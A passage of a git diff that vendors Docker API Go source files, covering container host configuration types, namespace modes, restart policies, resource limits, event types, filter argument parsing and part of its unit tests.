+}
+
+// IsHost indicates whether the container uses the host's ipc stack.
+func (n IpcMode) IsHost() bool {
+	return n == "host"
+}
+
+// IsContainer indicates whether the container uses a container's ipc stack.
+func (n IpcMode) IsContainer() bool {
+	parts := strings.SplitN(string(n), ":", 2)
+	return len(parts) > 1 && parts[0] == "container"
+}
+
+// Valid indicates whether the ipc stack is valid.
+func (n IpcMode) Valid() bool {
+	parts := strings.Split(string(n), ":")
+	switch mode := parts[0]; mode {
+	case "", "host":
+	case "container":
+		if len(parts) != 2 || parts[1] == "" {
+			return false
+		}
+	default:
+		return false
+	}
+	return true
+}
+
+// Container returns the name of the container ipc stack is going to be used.
+func (n IpcMode) Container() string {
+	parts := strings.SplitN(string(n), ":", 2)
+	if len(parts) > 1 {
+		return parts[1]
+	}
+	return ""
+}
+
+// UsernsMode represents userns mode in the container.
+type UsernsMode string
+
+// IsHost indicates whether the container uses the host's userns.
+func (n UsernsMode) IsHost() bool {
+	return n == "host"
+}
+
+// IsPrivate indicates whether the container uses the a private userns.
+func (n UsernsMode) IsPrivate() bool {
+	return !(n.IsHost())
+}
+
+// Valid indicates whether the userns is valid.
+func (n UsernsMode) Valid() bool {
+	parts := strings.Split(string(n), ":")
+	switch mode := parts[0]; mode {
+	case "", "host":
+	default:
+		return false
+	}
+	return true
+}
+
+// CgroupSpec represents the cgroup to use for the container.
+type CgroupSpec string
+
+// IsContainer indicates whether the container is using another container cgroup
+func (c CgroupSpec) IsContainer() bool {
+	parts := strings.SplitN(string(c), ":", 2)
+	return len(parts) > 1 && parts[0] == "container"
+}
+
+// Valid indicates whether the cgroup spec is valid.
+func (c CgroupSpec) Valid() bool {
+	return c.IsContainer() || c == ""
+}
+
+// Container returns the name of the container whose cgroup will be used.
+func (c CgroupSpec) Container() string {
+	parts := strings.SplitN(string(c), ":", 2)
+	if len(parts) > 1 {
+		return parts[1]
+	}
+	return ""
+}
+
+// UTSMode represents the UTS namespace of the container.
+type UTSMode string
+
+// IsPrivate indicates whether the container uses its private UTS namespace.
+func (n UTSMode) IsPrivate() bool {
+	return !(n.IsHost())
+}
+
+// IsHost indicates whether the container uses the host's UTS namespace.
+func (n UTSMode) IsHost() bool {
+	return n == "host"
+}
+
+// Valid indicates whether the UTS namespace is valid.
+func (n UTSMode) Valid() bool {
+	parts := strings.Split(string(n), ":")
+	switch mode := parts[0]; mode {
+	case "", "host":
+	default:
+		return false
+	}
+	return true
+}
+
+// PidMode represents the pid namespace of the container.
+type PidMode string
+
+// IsPrivate indicates whether the container uses its own new pid namespace.
+func (n PidMode) IsPrivate() bool {
+	return !(n.IsHost() || n.IsContainer())
+}
+
+// IsHost indicates whether the container uses the host's pid namespace.
+func (n PidMode) IsHost() bool {
+	return n == "host"
+}
+
+// IsContainer indicates whether the container uses a container's pid namespace.
+func (n PidMode) IsContainer() bool {
+	parts := strings.SplitN(string(n), ":", 2)
+	return len(parts) > 1 && parts[0] == "container"
+}
+
+// Valid indicates whether the pid namespace is valid.
+func (n PidMode) Valid() bool {
+	parts := strings.Split(string(n), ":")
+	switch mode := parts[0]; mode {
+	case "", "host":
+	case "container":
+		if len(parts) != 2 || parts[1] == "" {
+			return false
+		}
+	default:
+		return false
+	}
+	return true
+}
+
+// Container returns the name of the container whose pid namespace is going to be used.
+func (n PidMode) Container() string {
+	parts := strings.SplitN(string(n), ":", 2)
+	if len(parts) > 1 {
+		return parts[1]
+	}
+	return ""
+}
+
+// DeviceMapping represents the device mapping between the host and the container.
+type DeviceMapping struct {
+	PathOnHost        string
+	PathInContainer   string
+	CgroupPermissions string
+}
+
+// RestartPolicy represents the restart policies of the container.
+type RestartPolicy struct {
+	Name              string
+	MaximumRetryCount int
+}
+
+// IsNone indicates whether the container has the "no" restart policy.
+// This means the container will not automatically restart when exiting.
+func (rp *RestartPolicy) IsNone() bool {
+	return rp.Name == "no" || rp.Name == ""
+}
+
+// IsAlways indicates whether the container has the "always" restart policy.
+// This means the container will automatically restart regardless of the exit status.
+func (rp *RestartPolicy) IsAlways() bool {
+	return rp.Name == "always"
+}
+
+// IsOnFailure indicates whether the container has the "on-failure" restart policy.
+// This means the container will automatically restart of exiting with a non-zero exit status.
+func (rp *RestartPolicy) IsOnFailure() bool {
+	return rp.Name == "on-failure"
+}
+
+// IsUnlessStopped indicates whether the container has the
+// "unless-stopped" restart policy. This means the container will
+// automatically restart unless user has put it to stopped state.
+func (rp *RestartPolicy) IsUnlessStopped() bool {
+	return rp.Name == "unless-stopped"
+}
+
+// IsSame compares two RestartPolicy to see if they are the same
+func (rp *RestartPolicy) IsSame(tp *RestartPolicy) bool {
+	return rp.Name == tp.Name && rp.MaximumRetryCount == tp.MaximumRetryCount
+}
+
+// LogConfig represents the logging configuration of the container.
+type LogConfig struct {
+	Type   string
+	Config map[string]string
+}
+
+// Resources contains container's resources (cgroups config, ulimits...)
+type Resources struct {
+	// Applicable to all platforms
+	CPUShares int64 `json:"CpuShares"` // CPU shares (relative weight vs. other containers)
+	Memory    int64 // Memory limit (in bytes)
+	NanoCPUs  int64 `json:"NanoCpus"` // CPU quota in units of 10<sup>-9</sup> CPUs.
+
+	// Applicable to UNIX platforms
+	CgroupParent         string // Parent cgroup.
+	BlkioWeight          uint16 // Block IO weight (relative weight vs. other containers)
+	BlkioWeightDevice    []*blkiodev.WeightDevice
+	BlkioDeviceReadBps   []*blkiodev.ThrottleDevice
+	BlkioDeviceWriteBps  []*blkiodev.ThrottleDevice
+	BlkioDeviceReadIOps  []*blkiodev.ThrottleDevice
+	BlkioDeviceWriteIOps []*blkiodev.ThrottleDevice
+	CPUPeriod            int64           `json:"CpuPeriod"`          // CPU CFS (Completely Fair Scheduler) period
+	CPUQuota             int64           `json:"CpuQuota"`           // CPU CFS (Completely Fair Scheduler) quota
+	CPURealtimePeriod    int64           `json:"CpuRealtimePeriod"`  // CPU real-time period
+	CPURealtimeRuntime   int64           `json:"CpuRealtimeRuntime"` // CPU real-time runtime
+	CpusetCpus           string          // CpusetCpus 0-2, 0,1
+	CpusetMems           string          // CpusetMems 0-2, 0,1
+	Devices              []DeviceMapping // List of devices to map inside the container
+	DiskQuota            int64           // Disk limit (in bytes)
+	KernelMemory         int64           // Kernel memory limit (in bytes)
+	MemoryReservation    int64           // Memory soft limit (in bytes)
+	MemorySwap           int64           // Total memory usage (memory + swap); set `-1` to enable unlimited swap
+	MemorySwappiness     *int64          // Tuning container memory swappiness behaviour
+	OomKillDisable       *bool           // Whether to disable OOM Killer or not
+	PidsLimit            int64           // Setting pids limit for a container
+	Ulimits              []*units.Ulimit // List of ulimits to be set in the container
+
+	// Applicable to Windows
+	CPUCount           int64  `json:"CpuCount"`   // CPU count
+	CPUPercent         int64  `json:"CpuPercent"` // CPU percent
+	IOMaximumIOps      uint64 // Maximum IOps for the container system drive
+	IOMaximumBandwidth uint64 // Maximum IO in bytes per second for the container system drive
+}
+
+// UpdateConfig holds the mutable attributes of a Container.
+// Those attributes can be updated at runtime.
+type UpdateConfig struct {
+	// Contains container's resources (cgroups, ulimits)
+	Resources
+	RestartPolicy RestartPolicy
+}
+
+// HostConfig the non-portable Config structure of a container.
+// Here, "non-portable" means "dependent of the host we are running on".
+// Portable information *should* appear in Config.
+type HostConfig struct {
+	// Applicable to all platforms
+	Binds           []string      // List of volume bindings for this container
+	ContainerIDFile string        // File (path) where the containerId is written
+	LogConfig       LogConfig     // Configuration of the logs for this container
+	NetworkMode     NetworkMode   // Network mode to use for the container
+	PortBindings    nat.PortMap   // Port mapping between the exposed port (container) and the host
+	RestartPolicy   RestartPolicy // Restart policy to be used for the container
+	AutoRemove      bool          // Automatically remove container when it exits
+	VolumeDriver    string        // Name of the volume driver used to mount volumes
+	VolumesFrom     []string      // List of volumes to take from other container
+
+	// Applicable to UNIX platforms
+	CapAdd          strslice.StrSlice // List of kernel capabilities to add to the container
+	CapDrop         strslice.StrSlice // List of kernel capabilities to remove from the container
+	DNS             []string          `json:"Dns"`        // List of DNS server to lookup
+	DNSOptions      []string          `json:"DnsOptions"` // List of DNSOption to look for
+	DNSSearch       []string          `json:"DnsSearch"`  // List of DNSSearch to look for
+	ExtraHosts      []string          // List of extra hosts
+	GroupAdd        []string          // List of additional groups that the container process will run as
+	IpcMode         IpcMode           // IPC namespace to use for the container
+	Cgroup          CgroupSpec        // Cgroup to use for the container
+	Links           []string          // List of links (in the name:alias form)
+	OomScoreAdj     int               // Container preference for OOM-killing
+	PidMode         PidMode           // PID namespace to use for the container
+	Privileged      bool              // Is the container in privileged mode
+	PublishAllPorts bool              // Should docker publish all exposed port for the container
+	ReadonlyRootfs  bool              // Is the container root filesystem in read-only
+	SecurityOpt     []string          // List of string values to customize labels for MLS systems, such as SELinux.
+	StorageOpt      map[string]string `json:",omitempty"` // Storage driver options per container.
+	Tmpfs           map[string]string `json:",omitempty"` // List of tmpfs (mounts) used for the container
+	UTSMode         UTSMode           // UTS namespace to use for the container
+	UsernsMode      UsernsMode        // The user namespace to use for the container
+	ShmSize         int64             // Total shm memory usage
+	Sysctls         map[string]string `json:",omitempty"` // List of Namespaced sysctls used for the container
+	Runtime         string            `json:",omitempty"` // Runtime to use with this container
+
+	// Applicable to Windows
+	ConsoleSize [2]uint   // Initial console size (height,width)
+	Isolation   Isolation // Isolation technology of the container (eg default, hyperv)
+
+	// Contains container's resources (cgroups, ulimits)
+	Resources
+
+	// Mounts specs used by the container
+	Mounts []mount.Mount `json:",omitempty"`
+
+	// Run a custom init inside the container, if null, use the daemon's configured settings
+	Init *bool `json:",omitempty"`
+
+	// Custom init path
+	InitPath string `json:",omitempty"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go b/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go
new file mode 100644
index 0000000000..9fb79bed6f
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go
@@ -0,0 +1,81 @@
+// +build !windows
+
+package container
+
+import "strings"
+
+// IsValid indicates if an isolation technology is valid
+func (i Isolation) IsValid() bool {
+	return i.IsDefault()
+}
+
+// IsPrivate indicates whether container uses its private network stack.
+func (n NetworkMode) IsPrivate() bool {
+	return !(n.IsHost() || n.IsContainer())
+}
+
+// IsDefault indicates whether container uses the default network stack.
+func (n NetworkMode) IsDefault() bool {
+	return n == "default"
+}
+
+// NetworkName returns the name of the network stack.
+func (n NetworkMode) NetworkName() string {
+	if n.IsBridge() {
+		return "bridge"
+	} else if n.IsHost() {
+		return "host"
+	} else if n.IsContainer() {
+		return "container"
+	} else if n.IsNone() {
+		return "none"
+	} else if n.IsDefault() {
+		return "default"
+	} else if n.IsUserDefined() {
+		return n.UserDefined()
+	}
+	return ""
+}
+
+// IsBridge indicates whether container uses the bridge network stack
+func (n NetworkMode) IsBridge() bool {
+	return n == "bridge"
+}
+
+// IsHost indicates whether container uses the host network stack.
+func (n NetworkMode) IsHost() bool {
+	return n == "host"
+}
+
+// IsContainer indicates whether container uses a container network stack.
+func (n NetworkMode) IsContainer() bool {
+	parts := strings.SplitN(string(n), ":", 2)
+	return len(parts) > 1 && parts[0] == "container"
+}
+
+// IsNone indicates whether container isn't using a network stack.
+func (n NetworkMode) IsNone() bool {
+	return n == "none"
+}
+
+// ConnectedContainer is the id of the container which network this container is connected to.
+func (n NetworkMode) ConnectedContainer() string {
+	parts := strings.SplitN(string(n), ":", 2)
+	if len(parts) > 1 {
+		return parts[1]
+	}
+	return ""
+}
+
+// IsUserDefined indicates user-created network
+func (n NetworkMode) IsUserDefined() bool {
+	return !n.IsDefault() && !n.IsBridge() && !n.IsHost() && !n.IsNone() && !n.IsContainer()
+}
+
+//UserDefined indicates user-created network
+func (n NetworkMode) UserDefined() string {
+	if n.IsUserDefined() {
+		return string(n)
+	}
+	return ""
+}
diff --git a/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go b/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go
new file mode 100644
index 0000000000..0ee332ba68
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go
@@ -0,0 +1,87 @@
+package container
+
+import (
+	"strings"
+)
+
+// IsDefault indicates whether container uses the default network stack.
+func (n NetworkMode) IsDefault() bool {
+	return n == "default"
+}
+
+// IsNone indicates whether container isn't using a network stack.
+func (n NetworkMode) IsNone() bool {
+	return n == "none"
+}
+
+// IsContainer indicates whether container uses a container network stack.
+// Returns false as windows doesn't support this mode
+func (n NetworkMode) IsContainer() bool {
+	return false
+}
+
+// IsBridge indicates whether container uses the bridge network stack
+// in windows it is given the name NAT
+func (n NetworkMode) IsBridge() bool {
+	return n == "nat"
+}
+
+// IsHost indicates whether container uses the host network stack.
+// returns false as this is not supported by windows
+func (n NetworkMode) IsHost() bool {
+	return false
+}
+
+// IsPrivate indicates whether container uses its private network stack.
+func (n NetworkMode) IsPrivate() bool {
+	return !(n.IsHost() || n.IsContainer())
+}
+
+// ConnectedContainer is the id of the container which network this container is connected to.
+// Returns blank string on windows
+func (n NetworkMode) ConnectedContainer() string {
+	return ""
+}
+
+// IsUserDefined indicates user-created network
+func (n NetworkMode) IsUserDefined() bool {
+	return !n.IsDefault() && !n.IsNone() && !n.IsBridge()
+}
+
+// IsHyperV indicates the use of a Hyper-V partition for isolation
+func (i Isolation) IsHyperV() bool {
+	return strings.ToLower(string(i)) == "hyperv"
+}
+
+// IsProcess indicates the use of process isolation
+func (i Isolation) IsProcess() bool {
+	return strings.ToLower(string(i)) == "process"
+}
+
+// IsValid indicates if an isolation technology is valid
+func (i Isolation) IsValid() bool {
+	return i.IsDefault() || i.IsHyperV() || i.IsProcess()
+}
+
+// NetworkName returns the name of the network stack.
+func (n NetworkMode) NetworkName() string {
+	if n.IsDefault() {
+		return "default"
+	} else if n.IsBridge() {
+		return "nat"
+	} else if n.IsNone() {
+		return "none"
+	} else if n.IsUserDefined() {
+		return n.UserDefined()
+	}
+
+	return ""
+}
+
+//UserDefined indicates user-created network
+func (n NetworkMode) UserDefined() string {
+	if n.IsUserDefined() {
+		return string(n)
+	}
+	return ""
+}
diff --git a/vendor/github.com/docker/docker/api/types/error_response.go b/vendor/github.com/docker/docker/api/types/error_response.go
new file mode 100644
index 0000000000..dc942d9d9e
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/error_response.go
@@ -0,0 +1,13 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// ErrorResponse Represents an error.
+// swagger:model ErrorResponse
+type ErrorResponse struct {
+
+	// The error message.
+	// Required: true
+	Message string `json:"message"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/events/events.go b/vendor/github.com/docker/docker/api/types/events/events.go
new file mode 100644
index 0000000000..7129a65acf
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/events/events.go
@@ -0,0 +1,42 @@
+package events
+
+const (
+	// ContainerEventType is the event type that containers generate
+	ContainerEventType = "container"
+	// DaemonEventType is the event type that daemon generate
+	DaemonEventType = "daemon"
+	// ImageEventType is the event type that images generate
+	ImageEventType = "image"
+	// NetworkEventType is the event type that networks generate
+	NetworkEventType = "network"
+	// PluginEventType is the event type that plugins generate
+	PluginEventType = "plugin"
+	// VolumeEventType is the event type that volumes generate
+	VolumeEventType = "volume"
+)
+
+// Actor describes something that generates events,
+// like a container, or a network, or a volume.
+// It has a defined name and a set or attributes.
+// The container attributes are its labels, other actors
+// can generate these attributes from other properties.
+type Actor struct {
+	ID         string
+	Attributes map[string]string
+}
+
+// Message represents the information an event contains
+type Message struct {
+	// Deprecated information from JSONMessage.
+	// With data only in container events.
+	Status string `json:"status,omitempty"`
+	ID     string `json:"id,omitempty"`
+	From   string `json:"from,omitempty"`
+
+	Type   string
+	Action string
+	Actor  Actor
+
+	Time     int64 `json:"time,omitempty"`
+	TimeNano int64 `json:"timeNano,omitempty"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/filters/parse.go b/vendor/github.com/docker/docker/api/types/filters/parse.go
new file mode 100644
index 0000000000..e01a41deb8
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/filters/parse.go
@@ -0,0 +1,310 @@
+// Package filters provides helper function to parse and handle command line
+// filter, used for example in docker ps or docker images commands.
+package filters
+
+import (
+	"encoding/json"
+	"errors"
+	"fmt"
+	"regexp"
+	"strings"
+
+	"github.com/docker/docker/api/types/versions"
+)
+
+// Args stores filter arguments as map key:{map key: bool}.
+// It contains an aggregation of the map of arguments (which are in the form
+// of -f 'key=value') based on the key, and stores values for the same key
+// in a map with string keys and boolean values.
+// e.g given -f 'label=label1=1' -f 'label=label2=2' -f 'image.name=ubuntu'
+// the args will be {"image.name":{"ubuntu":true},"label":{"label1=1":true,"label2=2":true}}
+type Args struct {
+	fields map[string]map[string]bool
+}
+
+// NewArgs initializes a new Args struct.
+func NewArgs() Args {
+	return Args{fields: map[string]map[string]bool{}}
+}
+
+// ParseFlag parses the argument to the filter flag. Like
+//
+//   `docker ps -f 'created=today' -f 'image.name=ubuntu*'`
+//
+// If prev map is provided, then it is appended to, and returned. By default a new
+// map is created.
+func ParseFlag(arg string, prev Args) (Args, error) {
+	filters := prev
+	if len(arg) == 0 {
+		return filters, nil
+	}
+
+	if !strings.Contains(arg, "=") {
+		return filters, ErrBadFormat
+	}
+
+	f := strings.SplitN(arg, "=", 2)
+
+	name := strings.ToLower(strings.TrimSpace(f[0]))
+	value := strings.TrimSpace(f[1])
+
+	filters.Add(name, value)
+
+	return filters, nil
+}
+
+// ErrBadFormat is an error returned in case of bad format for a filter.
+var ErrBadFormat = errors.New("bad format of filter (expected name=value)")
+
+// ToParam packs the Args into a string for easy transport from client to server.
+func ToParam(a Args) (string, error) {
+	// this way we don't URL encode {}, just empty space
+	if a.Len() == 0 {
+		return "", nil
+	}
+
+	buf, err := json.Marshal(a.fields)
+	if err != nil {
+		return "", err
+	}
+	return string(buf), nil
+}
+
+// ToParamWithVersion packs the Args into a string for easy transport from client to server.
+// The generated string will depend on the specified version (corresponding to the API version).
+func ToParamWithVersion(version string, a Args) (string, error) {
+	// this way we don't URL encode {}, just empty space
+	if a.Len() == 0 {
+		return "", nil
+	}
+
+	// for daemons older than v1.10, filter must be of the form map[string][]string
+	buf := []byte{}
+	err := errors.New("")
+	if version != "" && versions.LessThan(version, "1.22") {
+		buf, err = json.Marshal(convertArgsToSlice(a.fields))
+	} else {
+		buf, err = json.Marshal(a.fields)
+	}
+	if err != nil {
+		return "", err
+	}
+	return string(buf), nil
+}
+
+// FromParam unpacks the filter Args.
+func FromParam(p string) (Args, error) {
+	if len(p) == 0 {
+		return NewArgs(), nil
+	}
+
+	r := strings.NewReader(p)
+	d := json.NewDecoder(r)
+
+	m := map[string]map[string]bool{}
+	if err := d.Decode(&m); err != nil {
+		r.Seek(0, 0)
+
+		// Allow parsing old arguments in slice format.
+		// Because other libraries might be sending them in this format.
+		deprecated := map[string][]string{}
+		if deprecatedErr := d.Decode(&deprecated); deprecatedErr == nil {
+			m = deprecatedArgs(deprecated)
+		} else {
+			return NewArgs(), err
+		}
+	}
+	return Args{m}, nil
+}
+
+// Get returns the list of values associates with a field.
+// It returns a slice of strings to keep backwards compatibility with old code.
+func (filters Args) Get(field string) []string {
+	values := filters.fields[field]
+	if values == nil {
+		return make([]string, 0)
+	}
+	slice := make([]string, 0, len(values))
+	for key := range values {
+		slice = append(slice, key)
+	}
+	return slice
+}
+
+// Add adds a new value to a filter field.
+func (filters Args) Add(name, value string) {
+	if _, ok := filters.fields[name]; ok {
+		filters.fields[name][value] = true
+	} else {
+		filters.fields[name] = map[string]bool{value: true}
+	}
+}
+
+// Del removes a value from a filter field.
+func (filters Args) Del(name, value string) {
+	if _, ok := filters.fields[name]; ok {
+		delete(filters.fields[name], value)
+		if len(filters.fields[name]) == 0 {
+			delete(filters.fields, name)
+		}
+	}
+}
+
+// Len returns the number of fields in the arguments.
+func (filters Args) Len() int {
+	return len(filters.fields)
+}
+
+// MatchKVList returns true if the values for the specified field matches the ones
+// from the sources.
+// e.g. given Args are {'label': {'label1=1','label2=1'}, 'image.name', {'ubuntu'}},
+//      field is 'label' and sources are {'label1': '1', 'label2': '2'}
+//      it returns true.
+func (filters Args) MatchKVList(field string, sources map[string]string) bool {
+	fieldValues := filters.fields[field]
+
+	//do not filter if there is no filter set or cannot determine filter
+	if len(fieldValues) == 0 {
+		return true
+	}
+
+	if len(sources) == 0 {
+		return false
+	}
+
+	for name2match := range fieldValues {
+		testKV := strings.SplitN(name2match, "=", 2)
+
+		v, ok := sources[testKV[0]]
+		if !ok {
+			return false
+		}
+		if len(testKV) == 2 && testKV[1] != v {
+			return false
+		}
+	}
+
+	return true
+}
+
+// Match returns true if the values for the specified field matches the source string
+// e.g. given Args are {'label': {'label1=1','label2=1'}, 'image.name', {'ubuntu'}},
+//      field is 'image.name' and source is 'ubuntu'
+//      it returns true.
+func (filters Args) Match(field, source string) bool {
+	if filters.ExactMatch(field, source) {
+		return true
+	}
+
+	fieldValues := filters.fields[field]
+	for name2match := range fieldValues {
+		match, err := regexp.MatchString(name2match, source)
+		if err != nil {
+			continue
+		}
+		if match {
+			return true
+		}
+	}
+	return false
+}
+
+// ExactMatch returns true if the source matches exactly one of the filters.
+func (filters Args) ExactMatch(field, source string) bool {
+	fieldValues, ok := filters.fields[field]
+	//do not filter if there is no filter set or cannot determine filter
+	if !ok || len(fieldValues) == 0 {
+		return true
+	}
+
+	// try to match full name value to avoid O(N) regular expression matching
+	return fieldValues[source]
+}
+
+// UniqueExactMatch returns true if there is only one filter and the source matches exactly this one.
+func (filters Args) UniqueExactMatch(field, source string) bool {
+	fieldValues := filters.fields[field]
+	//do not filter if there is no filter set or cannot determine filter
+	if len(fieldValues) == 0 {
+		return true
+	}
+	if len(filters.fields[field]) != 1 {
+		return false
+	}
+
+	// try to match full name value to avoid O(N) regular expression matching
+	return fieldValues[source]
+}
+
+// FuzzyMatch returns true if the source matches exactly one of the filters,
+// or the source has one of the filters as a prefix.
+func (filters Args) FuzzyMatch(field, source string) bool {
+	if filters.ExactMatch(field, source) {
+		return true
+	}
+
+	fieldValues := filters.fields[field]
+	for prefix := range fieldValues {
+		if strings.HasPrefix(source, prefix) {
+			return true
+		}
+	}
+	return false
+}
+
+// Include returns true if the name of the field to filter is in the filters.
+func (filters Args) Include(field string) bool {
+	_, ok := filters.fields[field]
+	return ok
+}
+
+// Validate ensures that all the fields in the filter are valid.
+// It returns an error as soon as it finds an invalid field.
+func (filters Args) Validate(accepted map[string]bool) error {
+	for name := range filters.fields {
+		if !accepted[name] {
+			return fmt.Errorf("Invalid filter '%s'", name)
+		}
+	}
+	return nil
+}
+
+// WalkValues iterates over the list of filtered values for a field.
+// It stops the iteration if it finds an error and it returns that error.
+func (filters Args) WalkValues(field string, op func(value string) error) error {
+	if _, ok := filters.fields[field]; !ok {
+		return nil
+	}
+	for v := range filters.fields[field] {
+		if err := op(v); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func deprecatedArgs(d map[string][]string) map[string]map[string]bool {
+	m := map[string]map[string]bool{}
+	for k, v := range d {
+		values := map[string]bool{}
+		for _, vv := range v {
+			values[vv] = true
+		}
+		m[k] = values
+	}
+	return m
+}
+
+func convertArgsToSlice(f map[string]map[string]bool) map[string][]string {
+	m := map[string][]string{}
+	for k, v := range f {
+		values := []string{}
+		for kk := range v {
+			if v[kk] {
+				values = append(values, kk)
+			}
+		}
+		m[k] = values
+	}
+	return m
+}
diff --git a/vendor/github.com/docker/docker/api/types/filters/parse_test.go b/vendor/github.com/docker/docker/api/types/filters/parse_test.go
new file mode 100644
index 0000000000..b2ed27b9ce
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/filters/parse_test.go
@@ -0,0 +1,417 @@
+package filters
+
+import (
+	"fmt"
+	"testing"
+)
+
+func TestParseArgs(t *testing.T) {
+	// equivalent of `docker ps -f 'created=today' -f 'image.name=ubuntu*' -f 'image.name=*untu'`
+	flagArgs := []string{
+		"created=today",
+		"image.name=ubuntu*",
+		"image.name=*untu",
+	}
+	var (
+		args = NewArgs()
+		err  error
+	)
+	for i := range flagArgs {
+		args, err = ParseFlag(flagArgs[i], args)
+		if err != nil {
+			t.Errorf("failed to parse %s: %s", flagArgs[i], err)
+		}
+	}
+	if len(args.Get("created")) != 1 {
+		t.Errorf("failed to set this arg")
+	}
+	if len(args.Get("image.name")) != 2 {
+		t.Errorf("the args should have collapsed")
+	}
+}
+
+func TestParseArgsEdgeCase(t *testing.T) {
+	var filters Args
+	args, err := ParseFlag("", filters)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if args.Len() != 0 {
+		t.Fatalf("Expected an empty Args (map), got %v", args)
+	}
+	if args, err = ParseFlag("anything", args); err == nil || err != ErrBadFormat {
+		t.Fatalf("Expected ErrBadFormat, got %v", err)
+	}
+}
+
+func TestToParam(t *testing.T) {
+	fields := map[string]map[string]bool{
+		"created":    {"today": true},
+		"image.name": {"ubuntu*": true, "*untu": true},
+	}
+	a := Args{fields: fields}
+
+	_, err := ToParam(a)
+	if err != nil {
+		t.Errorf("failed to marshal the filters: %s", err)
+	}
+}
+
+func TestToParamWithVersion(t *testing.T) {
+	fields := map[string]map[string]bool{
+		"created":    {"today": true},
+		"image.name": {"ubuntu*": true, "*untu": true},
+	}
+	a := Args{fields: fields}
+
+	str1, err := ToParamWithVersion("1.21", a)
+	if err != nil {
+		t.Errorf("failed to marshal the filters with version < 1.22: %s", err)
+	}
+	str2, err := ToParamWithVersion("1.22", a)
+	if err != nil {
+		t.Errorf("failed to marshal the filters with version >= 1.22: %s", err)
+	}
+	if str1 != `{"created":["today"],"image.name":["*untu","ubuntu*"]}` &&
+		str1 != `{"created":["today"],"image.name":["ubuntu*","*untu"]}` {
+		t.Errorf("incorrectly marshaled the filters: %s", str1)
+	}
+	if str2 != `{"created":{"today":true},"image.name":{"*untu":true,"ubuntu*":true}}` &&
+		str2 != `{"created":{"today":true},"image.name":{"ubuntu*":true,"*untu":true}}` {
+		t.Errorf("incorrectly marshaled the filters: %s", str2)
+	}
+}
+
+func TestFromParam(t *testing.T) {
+	invalids := []string{
+		"anything",
+		"['a','list']",
+		"{'key': 'value'}",
+		`{"key": "value"}`,
+	}
+	valid := map[*Args][]string{
+		&Args{fields: map[string]map[string]bool{"key": {"value": true}}}: {
+			`{"key": ["value"]}`,
+			`{"key": {"value": true}}`,
+		},
+		&Args{fields: map[string]map[string]bool{"key": {"value1": true, "value2": true}}}: {
+			`{"key": ["value1", "value2"]}`,
+			`{"key": {"value1": true, "value2": true}}`,
+		},
+		&Args{fields: map[string]map[string]bool{"key1": {"value1": true}, "key2": {"value2": true}}}: {
+			`{"key1": ["value1"], "key2": ["value2"]}`,
+			`{"key1": {"value1": true}, "key2": {"value2": true}}`,
+		},
+	}
+
+	for _, invalid := range invalids {
+		if _, err := FromParam(invalid); err == nil {
+			t.Fatalf("Expected an error with %v, got nothing", invalid)
+		}
+	}
+
+	for expectedArgs, matchers := range valid {
+		for _, json := range matchers {
+			args, err := FromParam(json)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if args.Len() != expectedArgs.Len() {
+				t.Fatalf("Expected %v, go %v", expectedArgs, args)
+			}
+			for key, expectedValues := range expectedArgs.fields {
+				values := args.Get(key)
+
+				if len(values) != len(expectedValues) {
+					t.Fatalf("Expected %v, go %v", expectedArgs, args)
+				}
+
+				for _, v := range values {
+					if !expectedValues[v] {
+						t.Fatalf("Expected %v, go %v", expectedArgs, args)
+					}
+				}
+			}
+		}
+	}
+}
+
+func TestEmpty(t *testing.T) {
+	a := Args{}
+	v, err := ToParam(a)
+	if err != nil {
+		t.Errorf("failed to marshal the filters: %s", err)
+	}
+	v1, err := FromParam(v)
+	if err != nil {
+		t.Errorf("%s", err)
+	}
+	if a.Len() != v1.Len() {
+		t.Errorf("these should both be empty sets")
+	}
+}
+
+func TestArgsMatchKVListEmptySources(t *testing.T) {
+	args := NewArgs()
+	if !args.MatchKVList("created", map[string]string{}) {
+		t.Fatalf("Expected true for (%v,created), got true", args)
+	}
+
+	args = Args{map[string]map[string]bool{"created": {"today": true}}}
+	if args.MatchKVList("created", map[string]string{}) {
+		t.Fatalf("Expected false for (%v,created), got true", args)
+	}
+}
+
+func TestArgsMatchKVList(t *testing.T) {
+	// Not empty sources
+	sources := map[string]string{
+		"key1": "value1",
+		"key2": "value2",
+		"key3": "value3",
+	}
+
+	matches := map[*Args]string{
+		&Args{}: "field",
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"today": true},
+			"labels":  map[string]bool{"key1": true}},
+		}: "labels",
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"today": true},
+			"labels":  map[string]bool{"key1=value1": true}},
+		}: "labels",
+	}
+
+	for args, field := range matches {
+		if args.MatchKVList(field, sources) != true {
+			t.Fatalf("Expected true for %v on %v, got false", sources, args)
+		}
+	}
+
+	differs := map[*Args]string{
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"today": true}},
+		}: "created",
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"today": true},
+			"labels":  map[string]bool{"key4": true}},
+		}: "labels",
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"today": true},
+			"labels":  map[string]bool{"key1=value3": true}},
+		}: "labels",
+	}
+
+	for args, field := range differs {
+		if args.MatchKVList(field, sources) != false {
+			t.Fatalf("Expected false for %v on %v, got true", sources, args)
+		}
+	}
+}
+
+func TestArgsMatch(t *testing.T) {
+	source := "today"
+
+	matches := map[*Args]string{
+		&Args{}: "field",
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"today": true}},
+		}: "today",
+		&Args{map[string]map[string]bool{
+			"created": map[string]bool{"to*": true}},
+		}: "created",
